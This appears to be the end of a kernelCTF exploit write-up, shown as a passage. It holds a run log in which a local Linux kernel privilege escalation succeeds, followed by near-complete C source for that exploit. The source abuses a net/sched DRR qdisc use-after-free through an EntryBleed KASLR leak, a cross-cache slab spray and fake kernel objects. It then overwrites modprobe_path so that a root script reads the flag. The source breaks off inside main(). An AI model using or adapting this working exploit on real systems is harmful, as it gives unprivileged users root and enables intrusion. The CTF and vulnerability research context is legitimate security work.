[>] Dropping scripts...
[>] Spraying child pids...
[>] Kernel base address: 0xffffffffa6000000
[>] Kernfs buffer address: 0xffffffffa9267b80
[>] Arbitrary write gadget address: 0xffffffffa6356310
[>] Modprobe path address: 0xffffffffa8662e80
[>] Return NULL gadget address: 0xffffffffa6d4ab80
[>] Doing the unshare...
[>] Bringing up lo interface...
[>] Pinning our process to core-0...
[>] Starting UDP listener...
[>] Creating pipes...
[>] Setting up initial classes...
[>] Creating root qdisc...
[>] Creating class 1:1...
[>] Creating class 1:3...
[>] Assigning plug qdisc to class 1:1...
[>] Assigning pfifo qdisc to class 1:3...
[>] Executing cross-cache stage-1...
[>] Executing cross-cache stage-2...
[>] Allocating victim class 1:2...
[>] Executing bug to reparent qdisc to 1:2 from 1:3...
[>] Displaying hierarchy setup...
class drr 1:1 root leaf 2: quantum 64Kb 
class drr 1:2 root leaf 3: quantum 64Kb 
class drr 1:3 root leaf 3: quantum 64Kb 
qdisc drr 1: dev lo root refcnt 2 
qdisc plug 2: dev lo parent 1:1 
qdisc pfifo 3: dev lo parent 1:3 refcnt 2 limit 1000p
[>] Enqueueing packets in 1:1 and 1:2...
[   10.508490] drr_dequeue: plug qdisc 2: is non-work-conserving?
[>] Deleting classes 1:1 and 1:2 and then cross-cache stage-3...
[   10.519000] ------------[ cut here ]------------
[   10.521778] list_del corruption, ffff8fdd50a008d0->next is NULL
[   10.525296] WARNING: CPU: 0 PID: 784 at lib/list_debug.c:49 __list_del_entry_valid+0x59/0xd0
[   10.530218] Modules linked in:
[   10.532091] CPU: 0 PID: 784 Comm: tc.bin Not tainted 5.15.173+ #1
[   10.535676] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[   10.540545] RIP: 0010:__list_del_entry_valid+0x59/0xd0
[   10.543555] Code: 48 8b 00 48 39 f8 75 67 48 8b 52 08 48 39 c2 75 74 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 80 71 cf a7 e8 e3a
[   10.554231] RSP: 0018:ffffa1020168b940 EFLAGS: 00010282
[   10.557286] RAX: 0000000000000000 RBX: ffff8fdd50a00880 RCX: 0000000000000000
[   10.561417] RDX: 0000000000000000 RSI: ffffa1020168b770 RDI: 00000000ffffffea
[   10.565575] RBP: 0000000000010003 R08: 00000000ffffdfff R09: 0000000000000001
[   10.570036] R10: 00000000ffffdfff R11: ffffffffa8669da0 R12: 0000000000000001
[   10.574238] R13: ffff8fdd44f8e000 R14: ffffffffa7ad11e0 R15: 0000000000010000
[   10.578407] FS:  000000001a406880(0000) GS:ffff8fdd5c400000(0000) knlGS:0000000000000000
[   10.583118] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   10.586532] CR2: 00000000005a6cc0 CR3: 0000000110d5a003 CR4: 0000000000370ef0
[   10.590718] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   10.594898] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   10.599087] Call Trace:
[   10.600704]  
[   10.602011]  ? __warn+0x81/0x100
[   10.603979]  ? __list_del_entry_valid+0x59/0xd0
[   10.606673]  ? report_bug+0x99/0xc0
[   10.608785]  ? handle_bug+0x34/0x80
[   10.610901]  ? exc_invalid_op+0x13/0x60
[   10.613228]  ? asm_exc_invalid_op+0x16/0x20
[   10.615710]  ? __list_del_entry_valid+0x59/0xd0
[   10.618473]  drr_qlen_notify+0x12/0x50
[   10.620778]  qdisc_tree_reduce_backlog+0x84/0x160
[   10.623558]  drr_delete_class+0x104/0x210
[   10.625959]  tc_ctl_tclass+0x488/0x5a0
[   10.628214]  ? exc_page_fault+0x76/0x140
[   10.630556]  rtnetlink_rcv_msg+0x21e/0x350
[   10.633230]  ? security_sock_rcv_skb+0x31/0x50
[   10.635869]  ? rtnl_calcit.isra.0+0x130/0x130
[   10.638517]  netlink_rcv_skb+0x4e/0x100
[   10.640868]  netlink_unicast+0x231/0x370
[   10.643209]  netlink_sendmsg+0x250/0x4b0
[   10.645546]  __sock_sendmsg+0x5c/0x70
[   10.647746]  ____sys_sendmsg+0x25a/0x2a0
[   10.650116]  ? import_iovec+0x17/0x20
[   10.652338]  ___sys_sendmsg+0x96/0xd0
[   10.654575]  __sys_sendmsg+0x76/0xc0
[   10.656746]  do_syscall_64+0x3d/0x90
[   10.658970]  entry_SYSCALL_64_after_hwframe+0x6c/0xd6
[   10.662043] RIP: 0033:0x4e7697
[   10.663880] Code: 64 89 02 48 c7 c0 ff ff ff ff eb bb 0f 1f 80 00 00 00 00 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 2e 00 000
[   10.674696] RSP: 002b:00007ffc56673e38 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
[   10.679091] RAX: ffffffffffffffda RBX: 0000000067ae1e0c RCX: 00000000004e7697
[   10.683247] RDX: 0000000000000000 RSI: 00007ffc56673ea0 RDI: 0000000000000043
[   10.687411] RBP: 00007ffc56674fb0 R08: 00000000005978a0 R09: 000000001a4102b0
[   10.691609] R10: 000000001a4082a0 R11: 0000000000000246 R12: 0000000000578448
[   10.695807] R13: 000000000054449b R14: 00000000005af620 R15: 0000000000000001
[   10.699977]  
[   10.701360] ---[ end trace 8e001f66f1703586 ]---
[>] Executing cross-cache stage-4...
[>] Executing cross-cache stage-5 and reclaiming page...
[>] Overwriting modprobe path...
[   11.859455] xt_cgroup: invalid path, errno=-2
[   11.864787] xt_cgroup: invalid path, errno=-2
[   11.869782] xt_cgroup: invalid path, errno=-2
[   11.874720] xt_cgroup: invalid path, errno=-2
[   11.879548] xt_cgroup: invalid path, errno=-2
[   11.884427] xt_cgroup: invalid path, errno=-2
[   11.889362] xt_cgroup: invalid path, errno=-2
[   11.894300] xt_cgroup: invalid path, errno=-2
[   11.899125] xt_cgroup: invalid path, errno=-2
[   11.904009] xt_cgroup: invalid path, errno=-2
[   16.861299] cgroup_mt_check_v2: 2317 callbacks suppressed
[   16.861303] xt_cgroup: invalid path, errno=-2
[   16.869908] xt_cgroup: invalid path, errno=-2
[   16.875051] xt_cgroup: invalid path, errno=-2
[   16.880257] xt_cgroup: invalid path, errno=-2
[   16.885424] xt_cgroup: invalid path, errno=-2
[   16.890615] xt_cgroup: invalid path, errno=-2
[   16.896175] xt_cgroup: invalid path, errno=-2
[   16.901367] xt_cgroup: invalid path, errno=-2
[   16.906582] xt_cgroup: invalid path, errno=-2
[   16.911806] xt_cgroup: invalid path, errno=-2
[>] Modprobe path is *probably* overwritten lol!
kernelCTF{v1:cos-105-17412.535.34:SNIPPED}
./trigger.sh: 1: ����: not found
user@cos-105-17412:/tmp$ ^C

Thanks && Misc

Huge thanks to all the kCTF moderators like Jordy and KT who answer all my questions and are very charitable. Also big thanks to my friends Chompie and Firzen for being my sounding board and supportive. Also thanks to Pumpkin for always helping me and answering DMs.

The exploit still has some artifacts in it because I did the initial development work on a 6.* kernel version and then switched to a kCTF bzImage, which is kernel version 5.*. All of the nftables code for spraying tables with userdata is also still in the exploit; I kept that code to do the kmalloc-128 page reservation required to get my victim page sent back to the allocator. In a way, I did finally get to use table->udata.

Exploit

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#include 
#include 
#include 
#include  

// Kernel base address
uint64_t g_kernel_base = 0;

// Address of kernfs_pr_cont_buf
uint64_t g_kernfs_addr = 0;

// Offset of kernfs_pr_cont_buf from the kernel base, per kernel version
uint64_t kernfs_addr_off_6 = 0x3691a80;
uint64_t kernfs_addr_off_5 = 0x3267b80;

// Offset for entry_SYSCALL_64_offset
uint64_t g_entry_syscall_off = 0;

// Based on kernel version
uint64_t entry_syscall_off_6 = 0x1400040;
uint64_t entry_syscall_off_5 = 0x1200080;

// Our arbitrary write gadget clear_nlink
uint64_t g_write_gadget_addr = 0;

// Based on kernel version
uint64_t write_gadget_off_5 = 0x356310;
uint64_t write_gadget_off_6 = 0;

// Modprobe path addr
uint64_t g_modprobe_addr = 0;

// Based on kernel version 
uint64_t modprobe_off_5 = 0x2662e80;
uint64_t modprobe_off_6 = 0;

// A mutable write target that we use to overwrite modprobe one byte at a time
uint64_t g_write_target = 0;

// Our Return NULL gadget
uint64_t g_null_gadget_addr = 0;

// Based on kernel version
uint64_t null_gadget_off_5 = 0xd4ab80;
uint64_t null_gadget_off_6 = 0;

// We target [rax + 0x450] with our gadget, so we subtract this from the ptr
// value in our fake buffer
#define WRITE_TARGET_OFFSET 0x450UL

// Pin our process (and children from system() / fork()) to core-0
void pin_to_core_0() {
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(0, &mask);

    if (sched_setaffinity(0, sizeof(mask), &mask) < 0) {
        perror("sched_setaffinity");
        exit(-1);
    }
}

// Write to a file so we can set our user ids
int write_mapping(const char *path, const char *content) {
    int fd = open(path, O_WRONLY);
    if (fd == -1) {
        printf("Failed to open %s: %s\n", path, strerror(errno));
        return -1;
    }
    
    if (write(fd, content, strlen(content)) != strlen(content)) {
        printf("Failed to write to %s: %s\n", path, strerror(errno));
        close(fd);
        return -1;
    }
    close(fd);
    return 0;
}

// Unshare our namespaces so that we can get the caps we want
void unshare_stuff(void) {
    // Unshare into new user namespace
    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == -1) {
        printf("unshare failed: %s\n", strerror(errno));
        exit(-1);
    }

    // First disable setgroups
    if (write_mapping("/proc/self/setgroups", "deny") == -1) {
        printf("Failed to disable setgroups\n");
        exit(-1);
    }

    // Then map our UID and GID
    if (write_mapping("/proc/self/uid_map", "0 1000 1") == -1 ||
        write_mapping("/proc/self/gid_map", "0 1000 1") == -1) {
        printf("Failed to write ID mappings\n");
        exit(-1);
    }

    // Bring up the loopback interface
    printf("[>] Bringing up lo interface...\n");
    if (system("./ip.bin link set lo up") != 0) {
        printf("Failed to bring up loopback interface.\n");
        exit(-1);
    }
}

// Start listener
void start_udp_listener(void) {
    system("nohup ./socat.bin -u UDP-RECV:8888 STDOUT >/dev/null 2>&1 &");
}

#define PIPE_MAX 32
#define PIPE_READ 0
#define PIPE_WRITE 1

// An array to hold pipe fds
int g_pipes_arr[PIPE_MAX][2];

// Allocate pipes 
void allocate_pipes(void) {
    for (int i = 0; i < PIPE_MAX; i++) {
        if (pipe(g_pipes_arr[i]) == -1) {
            perror("pipe");
            exit(-1);
        }
    }
}

// Attempt to reclaim our page by allocating pages to back the pipes
void reclaim_page(void) {
    char write_buf[4096] = { 0 };
    memset(&write_buf[0], 'B', 4096);

    for (int i = 0; i < PIPE_MAX; i++) {
        write(g_pipes_arr[i][PIPE_WRITE], write_buf, 4096);
    }
}

#define NUM_SPRAY_OBJS 4096UL
#define USERDATA_SIZE 128UL
#define MNL_BUF_SIZE 4096UL

// Global for user data, set once
char g_userdata[USERDATA_SIZE];

// Creates a single nftables table to spray userdata
void create_table(const char *table_name) {
    if (!table_name) {
        fprintf(stderr, "Error: Table name is NULL\n");
        return;
    }

    struct mnl_socket *mnl_sock;
    struct mnl_nlmsg_batch *batch;
    char buf[MNL_BUF_SIZE];

    // Open Netlink socket
    mnl_sock = mnl_socket_open(NETLINK_NETFILTER);
    if (!mnl_sock) {
        perror("mnl_socket_open");
        exit(EXIT_FAILURE);
    }

    // Connect to Netlink
    if (mnl_socket_bind(mnl_sock, 0, MNL_SOCKET_AUTOPID) < 0) {
        perror("mnl_socket_bind");
        mnl_socket_close(mnl_sock);
        exit(EXIT_FAILURE);
    }

    // Initialize Netlink batch (one message per batch)
    memset(buf, 0, sizeof(buf));
    batch = mnl_nlmsg_batch_start(buf, sizeof(buf));

    int seq = 0;
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    struct nftnl_table *table = nftnl_table_alloc();
    if (!table) {
        perror("nftnl_table_alloc");
        mnl_socket_close(mnl_sock);
        return;
    }

    // Set table attributes
    nftnl_table_set_u32(table, NFTNL_TABLE_FAMILY, NFPROTO_INET);
    nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name);

    // Set 128-byte userdata
    nftnl_table_set_data(table, NFTNL_TABLE_USERDATA, g_userdata, USERDATA_SIZE);

    // Build Netlink message
    struct nlmsghdr *msg_hdr = nftnl_table_nlmsg_build_hdr(
        mnl_nlmsg_batch_current(batch),
        NFT_MSG_NEWTABLE,
        NFPROTO_INET,
        NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK,
        seq++
    );

    // Attach table payload
    nftnl_table_nlmsg_build_payload(msg_hdr, table);
    nftnl_table_free(table);
    mnl_nlmsg_batch_next(batch);

    // End batch (one message only)
    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    // Send the batch (one message per batch)
    if (mnl_socket_sendto(mnl_sock, mnl_nlmsg_batch_head(batch),
                          mnl_nlmsg_batch_size(batch)) < 0) {
        perror("mnl_socket_sendto");
        mnl_socket_close(mnl_sock);
        return;
    }

    ssize_t recv_len = mnl_socket_recvfrom(mnl_sock, buf, sizeof(buf));
    if (recv_len < 0) {
        perror("mnl_socket_recvfrom");
    } else {
        struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
        if (nlh->nlmsg_type == NLMSG_ERROR) {
            struct nlmsgerr *err = (struct nlmsgerr *)mnl_nlmsg_get_payload(nlh);
            if (err->error) {
                fprintf(stderr, "Netlink error: %s\n", strerror(-err->error));
            }
        }
    }

    // Cleanup
    mnl_nlmsg_batch_stop(batch);
    mnl_socket_close(mnl_sock);
}

// Deletes a single nftables table
void delete_table(const char *table_name) {
    if (!table_name) {
        fprintf(stderr, "Error: Table name is NULL\n");
        return;
    }

    struct mnl_socket *mnl_sock;
    struct mnl_nlmsg_batch *batch;
    char buf[MNL_BUF_SIZE];

    // Open Netlink socket
    mnl_sock = mnl_socket_open(NETLINK_NETFILTER);
    if (!mnl_sock) {
        perror("mnl_socket_open");
        exit(EXIT_FAILURE);
    }

    // Connect to Netlink
    if (mnl_socket_bind(mnl_sock, 0, MNL_SOCKET_AUTOPID) < 0) {
        perror("mnl_socket_bind");
        mnl_socket_close(mnl_sock);
        exit(EXIT_FAILURE);
    }

    // Initialize Netlink batch
    memset(buf, 0, sizeof(buf));
    batch = mnl_nlmsg_batch_start(buf, sizeof(buf));

    int seq = 0;
    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    struct nftnl_table *table = nftnl_table_alloc();
    if (!table) {
        perror("nftnl_table_alloc");
        mnl_socket_close(mnl_sock);
        return;
    }

    // Set table attributes
    nftnl_table_set_u32(table, NFTNL_TABLE_FAMILY, NFPROTO_INET);
    nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name);

    // Build Netlink message for table deletion
    struct nlmsghdr *msg_hdr = nftnl_table_nlmsg_build_hdr(
        mnl_nlmsg_batch_current(batch),
        NFT_MSG_DELTABLE,
        NFPROTO_INET,
        NLM_F_ACK,
        seq++
    );

    // Attach table payload
    nftnl_table_nlmsg_build_payload(msg_hdr, table);
    nftnl_table_free(table);
    mnl_nlmsg_batch_next(batch);

    // End batch
    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    // Send the batch
    if (mnl_socket_sendto(mnl_sock, mnl_nlmsg_batch_head(batch),
                          mnl_nlmsg_batch_size(batch)) < 0) {
        perror("mnl_socket_sendto");
        mnl_socket_close(mnl_sock);
        return;
    }

    ssize_t recv_len = mnl_socket_recvfrom(mnl_sock, buf, sizeof(buf));
    if (recv_len < 0) {
        perror("mnl_socket_recvfrom");
    } else {
        struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
        if (nlh->nlmsg_type == NLMSG_ERROR) {
            struct nlmsgerr *err = (struct nlmsgerr *)mnl_nlmsg_get_payload(nlh);
            if (err->error) {
                fprintf(stderr, "Netlink error: %s\n", strerror(-err->error));
                printf("Table name was: %s\n", table_name);
            }
        }
    }

    // Cleanup
    mnl_nlmsg_batch_stop(batch);
    mnl_socket_close(mnl_sock);
}

void spray_tables(void) {
    for (int i = 0; i < NUM_SPRAY_OBJS; i++) {
        char table_name[32];
        snprintf(table_name, sizeof(table_name), "table.%d", i);
        create_table(table_name);
    }
}

// Try to use entry bleed to leak the kernel base
#define KERNEL_LOWER_BOUND 0xffffffff80000000ULL
#define KERNEL_UPPER_BOUND 0xffffffffc0000000ULL

uint64_t sidechannel(uint64_t addr) {
  uint64_t a, b, c, d;
  asm volatile (".intel_syntax noprefix;"
    "mfence;"
    "rdtscp;"
    "mov %0, rax;"
    "mov %1, rdx;"
    "xor rax, rax;"
    "lfence;"
    "prefetchnta qword ptr [%4];"
    "prefetcht2 qword ptr [%4];"
    "xor rax, rax;"
    "lfence;"
    "rdtscp;"
    "mov %2, rax;"
    "mov %3, rdx;"
    "mfence;"
    ".att_syntax;"
    : "=r" (a), "=r" (b), "=r" (c), "=r" (d)
    : "r" (addr)
    : "rax", "rbx", "rcx", "rdx");
  a = (b << 32) | a;
  c = (d << 32) | c;
  return c - a;
}

#define STEP 0x100000ull
#define DUMMY_ITERATIONS 5
#define ITERATIONS 100
#define ARR_SIZE ((KERNEL_UPPER_BOUND - KERNEL_LOWER_BOUND) / STEP)

uint64_t leak_syscall_entry(uint64_t scan_start, uint64_t scan_end) 
{
    uint64_t data[ARR_SIZE] = {0};
    uint64_t min = ~0, addr = ~0;

    for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++)
    {
        for (uint64_t idx = 0; idx < ARR_SIZE; idx++) 
        {
            uint64_t test = scan_start + idx * STEP;
            syscall(104);
            uint64_t time = sidechannel(test);
            if (i >= DUMMY_ITERATIONS)
                data[idx] += time;
        }
    }

    for (int i = 0; i < ARR_SIZE; i++)
    {
        data[i] /= ITERATIONS;
        if (data[i] < min)
        {
            min = data[i];
            addr = scan_start + i * STEP;
        }
    }

    return addr;
}

// Setup our class/qdisc hierarchy
void setup_classes(void) {
    // Create root qdisc
    printf("[>] Creating root qdisc...\n");
    system("./tc.bin qdisc add dev lo root handle 1:0 drr");

    // Create class 1:1
    printf("[>] Creating class 1:1...\n");
    system("./tc.bin class add dev lo classid 1:1 drr");

    // Create class 1:3
    printf("[>] Creating class 1:3...\n");
    system("./tc.bin class add dev lo classid 1:3 drr");

    // Assign plug qdisc to class 1:1
    printf("[>] Assigning plug qdisc to class 1:1...\n");
    system("./tc.bin qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024");

    // Assign pfifo qdisc to class 1:3
    printf("[>] Assigning pfifo qdisc to class 1:3...\n");
    system("./tc.bin qdisc add dev lo parent 1:3 handle 3:0 pfifo");
}

// Cross cache defines
#define OBJS_PER_SLAB 32UL  // Number of objects in a kmalloc-128 page
#define CPU_PARTIAL 30UL    // Number of partial pages for kmalloc-128
#define OVERFLOW_FACTOR 4UL // We want to overkill this 

// Cross cache globals
typedef struct cc_bucket {
    uint64_t min;
    uint64_t max;
} cc_bucket_t;

cc_bucket_t cc1_bucket = { 0 };
cc_bucket_t cc2_bucket = { 0 };
cc_bucket_t cc3_bucket = { 0 };

// Cross-cache stage 1: Spray enough objects that we start getting brand new
// slab allocations in kmalloc-128 and also reserve enough pages that when
// they are placed on the partials list they will evict empty pages 
void cc_1(void) {
    // Calculate the number of objects to spray
    uint64_t spray_amt = (OBJS_PER_SLAB * (CPU_PARTIAL + 1)) * OVERFLOW_FACTOR;

    // Spray the tables
    for (int i = 0; i < spray_amt; i++) {
        char table_name[32];
        snprintf(table_name, sizeof(table_name), "table.%d", i);
        create_table(table_name);
    }

    // Update the bucket
    cc1_bucket.min = 0;
    cc1_bucket.max = spray_amt - 1;
}

// Cross-cache stage 2: Allocate enough objects that we probably land somewhere
// in the middle of a new slab (page) so that our object is probably not the 
// exact first or last object on the page
void cc_2(void) {
    // Calculate the number of objects to spray
    uint64_t spray_amt = OBJS_PER_SLAB - 1;

    // Take into account cc1 when spraying
    uint64_t offset = cc1_bucket.max + 1;
    for (int i = 0; i < spray_amt; i++) {
        char table_name[32];
        snprintf(table_name, sizeof(table_name), "table.%ld", i + offset);
        create_table(table_name);
    }

    // Update the bucket
    cc2_bucket.min = offset;
    cc2_bucket.max = offset + spray_amt;
}

// Cross-cache stage 3: Allocate enough objects to complete the victim slab and 
// probably spill over onto a brand new slab
void cc_3(void) {
    // Calculate the number of objects to spray
    uint64_t spray_amt = OBJS_PER_SLAB + 2; // Extra one here for class 1:1?

    // Take into account cc2 when spraying
    uint64_t offset = cc2_bucket.max;
    for (int i = 0; i < spray_amt; i++) {
        char table_name[32];
        snprintf(table_name, sizeof(table_name), "table.%ld", i + offset);
        create_table(table_name);
    }

    // Update the bucket
    cc3_bucket.min = offset;
    cc3_bucket.max = offset + spray_amt; 
}

// Free all of the objects we allocated in steps 2 and 3. This will place these
// pages on the kmalloc-128 partials list
void cc_4(void) {
    // Calculate the id to start with and the amt to free
    uint64_t start = cc2_bucket.min;
    uint64_t free_amt = cc3_bucket.max - start;

    for (int i = 0; i < free_amt; i++) {
        char table_name[32];
        snprintf(table_name, sizeof(table_name), "table.%ld", i + start);
        delete_table(table_name);
    }
}

// Free an object on each of the pages that we allocated in step 1. This will
// place all of these pages onto the partials list and evict our empty page
void cc_5(void) {
    // Pick the first object to free
    uint64_t start = cc1_bucket.min;

    // Establish the max free object
    uint64_t max = cc1_bucket.max;

    // Free one object per page 
    for (int i = start; i < max; i += OBJS_PER_SLAB) {
        char table_name[32];
        snprintf(table_name, sizeof(table_name), "table.%d", i);
        delete_table(table_name);
    }
}

char *required_files[] = {
    "tc.bin",
    "ip.bin",
    "socat.bin",
    "iptables.bin"
};

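// Derive the count from the array so every required file gets checked
size_t num_files = sizeof(required_files) / sizeof(required_files[0]);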

int get_kernel_version(void) {
    struct utsname buffer;
    
    if (uname(&buffer) != 0) {
        perror("uname");
        exit(-1);
    }

    int major_version = 0;
    sscanf(buffer.release, "%d", &major_version);

    return major_version;
}

// Fake class data
uint8_t g_class[128] = { 0 };

// Setup the fake class contents in the pipes
void setup_fake_class(void) {
    // Set each one up with cyclical pattern for debugging
    uint64_t *ptr = (uint64_t *)&g_class[0];
    uint64_t val = 0x4141414141414141;
    for (int i = 0; i < 128 / 8; i++) {
        ptr[i] = val;
        val += 0x0101010101010101;
    }

    // Fake &cl->qdisc, set it to the address of the kernfs buffer + 8 to avoid
    // a NULL later when we use the address of &qdisc->gso_skb
    ptr[12] = g_kernfs_addr + 8;

    // Fake the &cl->deficit value, set it such that it is always greater than
    // the "len" returned from qdisc_pkt_len inside of drr_dequeue
    ptr[13] = 0xFFFFFFFFFFFFFFFF;

    // Fake class data is setup, we can fit 32 on a page. So each pipe gets
    // 32 fake classes in its backing page. Reset all the pipe buffer contents
    // to be the fake class
    char drain[4096] = { 0 };
    for (int i = 0; i < PIPE_MAX; i++) {
        // Drain the current pipe
        read(g_pipes_arr[i][PIPE_READ], drain, 4096);

        // Write the class contents to the pipe 32 times
        for (int j = 0; j < 32; j++) {
            ssize_t bytes_written = 0;
            while (bytes_written < 128) {
                ssize_t ret = 
                    write(
                        g_pipes_arr[i][PIPE_WRITE],
                        g_class + bytes_written,
                        128 - bytes_written);
                if (ret <= 0) {
                    perror("write failed");
                    exit(EXIT_FAILURE);
                }
                bytes_written += ret;
            }
        }
    }
}


// Fake qdisc data
uint8_t g_qdisc[4096] = { 0 };

// Send controlled data to deducible address in kernel from kernel base
void fill_kernfs_buf(void) {
    // Create a lockfile that we can actually use
    setenv("XTABLES_LOCKFILE", "/tmp/xtables.lock", 1);

    // Redirect stdout and stderr to /dev/null
    int devnull = open("/dev/null", O_WRONLY);
    if (devnull < 0) {
        exit(-1);
    }
    dup2(devnull, STDOUT_FILENO);
    dup2(devnull, STDERR_FILENO);
    close(devnull);

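    // Execute iptables to fill buffer
    execl("./iptables.bin", "iptables", "-A", "OUTPUT", "-m", "cgroup", "--path",
        g_qdisc, "-j", "LOG", (char *)NULL);

    // execl only returns on failure, don't let the child fall through into
    // the parent's code path
    exit(-1);
}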

// Check for NULL byte in u64
int has_null(uint64_t val) {
    for (int i = 0; i < 8; i++) {
        if (((val >> (i * 8)) & 0xFF) == 0) {
            return 1;
        }
    }
    return 0;
}

void setup_fake_qdisc(size_t num_complete) {
    // Set each one up with cyclical pattern for debugging
    uint64_t *ptr = (uint64_t *)&g_qdisc[0];
    uint64_t val = 0x0101010101010101;
    for (int i = 0; i < 4096 / 8; i++) {
        ptr[i] = val;
        val += 0x0101010101010101;
    }

    // Fake &qdisc->ops, set it kind of far into the kernfs_buf to avoid conflict
    ptr[4] = g_kernfs_addr + 32;

    // Fake &qdisc->ops->peek
    ptr[11] = g_write_gadget_addr;

    // The write address for the write gadget
    ptr[6] = g_write_target + num_complete;

    // Inside qdisc_dequeue_peeked, we do skb_peek(&sch->gso_skb) and that
    // address has to point to itself, so make &sch->gso_skb equal itself
    ptr[17] = g_kernfs_addr + 0x88;

    // Place pointer to our return NULL gadget so that qdisc_dequeue_peeked
    // returns NULL
    ptr[2] = g_null_gadget_addr;

    // NULL gadget does `return dst->dev->mtu` and dev happens to be the first
    // field, so set ours to a pointer that points to NULL (NULL happens later
    // in the kernfs_buf)
    ptr[1] = g_kernfs_addr + 512;

    // These addresses cannot have a NULL in them or else our kernfs_buf gets
    // NULL terminated and we're out of luck
    if (
        has_null(g_kernfs_addr + 120) || 
        has_null(g_write_gadget_addr) ||
        has_null(g_write_target)      ||
        has_null(g_kernfs_addr + 0x88)
        ) {
        printf("NULL ptr in these values: 0x%lx, 0x%lx\n",
            g_kernfs_addr + 120, g_write_gadget_addr);
        exit(-1);
    }
}

// Send kernfs data to the kernel
void send_kernfs_data(void) {
    int pid = fork();
    if (pid < 0) {
        perror("fork");
        exit(-1);
    }

    // Child
    if (pid == 0) {
        fill_kernfs_buf(); // Doesn't return
    }

    // Parent, wait for child to finish
    int status;
    waitpid(pid, &status, 0);
}

// Trigger the bug
void trigger_bug(void) {
    system("echo \"\" | ./socat.bin -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10002))");
}

// Trigger bug and increment kernel value for /sbin/modprobe overwrite
void increment_kernel_val(size_t num_complete) {
    // Reset the fake class data, because deficit changes each iteration
    setup_fake_class();

    // Reset the fake qdisc data, we NULL out the field in the increment gadget
    setup_fake_qdisc(num_complete);

    // Send the data to the kernel
    send_kernfs_data();

    // Trigger the bug
    trigger_bug();
}

// Overwrite modprobe path
void overwrite_modprobe(void) {
    // We have an increment gadget as our write primitive. This means we'll 
    // target each byte of /sbin/modprobe at a time and increment that byte
    // until it's the right value. We start here: /'s'bin/modprobe. The way
    // that I decided to do this was to simply encode the logic in this function
    // by simulating each write as we do it in the kernel and then we can
    // check in the program if we're done or not. So let's setup our simulated
    // values:
    // 
    // What we're starting with
    const char sim_start[] = "/sbin/modprobe";

    // What our goal is
    const char sim_goal[] = "/proc/500/fd/3";

    // Buffer to simulate writes
    uint8_t sim_modprobe[128] = { 0 };
    memcpy(sim_modprobe, sim_start, sizeof(sim_start));

    // What we're targeting right now. We start at offset 1 because '/' already
    // works for us
    char *sim_write_target = (char *)&sim_modprobe[1];

    // Iterate until the memory is identical
    size_t num_complete = 0;
    int64_t *write_ptr = (int64_t *)sim_write_target;
    while (memcmp(sim_goal, sim_modprobe, sizeof(sim_goal))) {
        // Iterate until the character matches
        while (memcmp(sim_write_target, sim_goal + num_complete + 1, 1)) {
            // Increment the val and set it
            int64_t curr_val = *write_ptr;
            curr_val++;
            *write_ptr = curr_val;

            // Increment the value in the kernel
            increment_kernel_val(num_complete);
        }

        // This character matches, move to the next character
        sim_write_target++;
        write_ptr = (int64_t *)sim_write_target;
        num_complete++;
    }
}

#define BUFFER_SIZE 1024

// What children do
void child_func() {
    // Open the privesc script
    int fd = open("privesc.sh", O_RDONLY);
    if (fd != 3) {
        printf("Got the wrong fd for privesc.sh\n");
        exit(-1);
    }

    char buffer[BUFFER_SIZE];
    ssize_t bytes_read;

    // Block until there's data to read from stdin
    while ((bytes_read = read(STDIN_FILENO, buffer, sizeof(buffer))) > 0) {
        write(STDOUT_FILENO, buffer, bytes_read);
    }

    // Handle possible read errors
    if (bytes_read < 0) {
        perror("read");
        exit(EXIT_FAILURE);
    }

    // Exit
    exit(0);
}

// How many child processes we spawn
#define NUM_CHILDS 500UL

// Spray children processes so we have a predictable pid in the container
void spray_children(void) {
    for (int i = 0; i < NUM_CHILDS; i++) {
        int pid = fork();
        if (pid < 0) {
            perror("fork");
            exit(-1);
        }

        // Child
        if (pid == 0) {
            child_func();
        }
    }
}

int main(void) {
    // Drop scripts to disk
    printf("[>] Dropping scripts...\n");
    system("printf '\xff\xff\xff\xff' > trigger.sh");
    system("echo '#!/bin/bash' > privesc.sh");
    system("echo 'cat /flag > /proc/500/fd/0' >> privesc.sh");
    system("chmod +x trigger.sh privesc.sh");

    // Spray children processes
    printf("[>] Spraying child pids...\n");
    spray_children();

    // Check kernel version
    int major = get_kernel_version();
    if (major != 5 && major != 6) {
        printf("Wrong kernel version\n");
        exit(-1);
    }

    // Set offsets for kernel 5
    if (major == 5) {
        g_kernfs_addr = kernfs_addr_off_5;
        g_entry_syscall_off = entry_syscall_off_5;
        g_write_gadget_addr = write_gadget_off_5;
        g_modprobe_addr = modprobe_off_5;
        g_null_gadget_addr = null_gadget_off_5;
    }

    // Set offsets for kernel 6
    else {
        g_kernfs_addr = kernfs_addr_off_6;
        g_entry_syscall_off = entry_syscall_off_6;
        g_write_gadget_addr = write_gadget_off_6;
        g_modprobe_addr = modprobe_off_6;
        g_null_gadget_addr = null_gadget_off_6;
    }

    // Make sure we have the files we need, this is just for my lab not kCTF
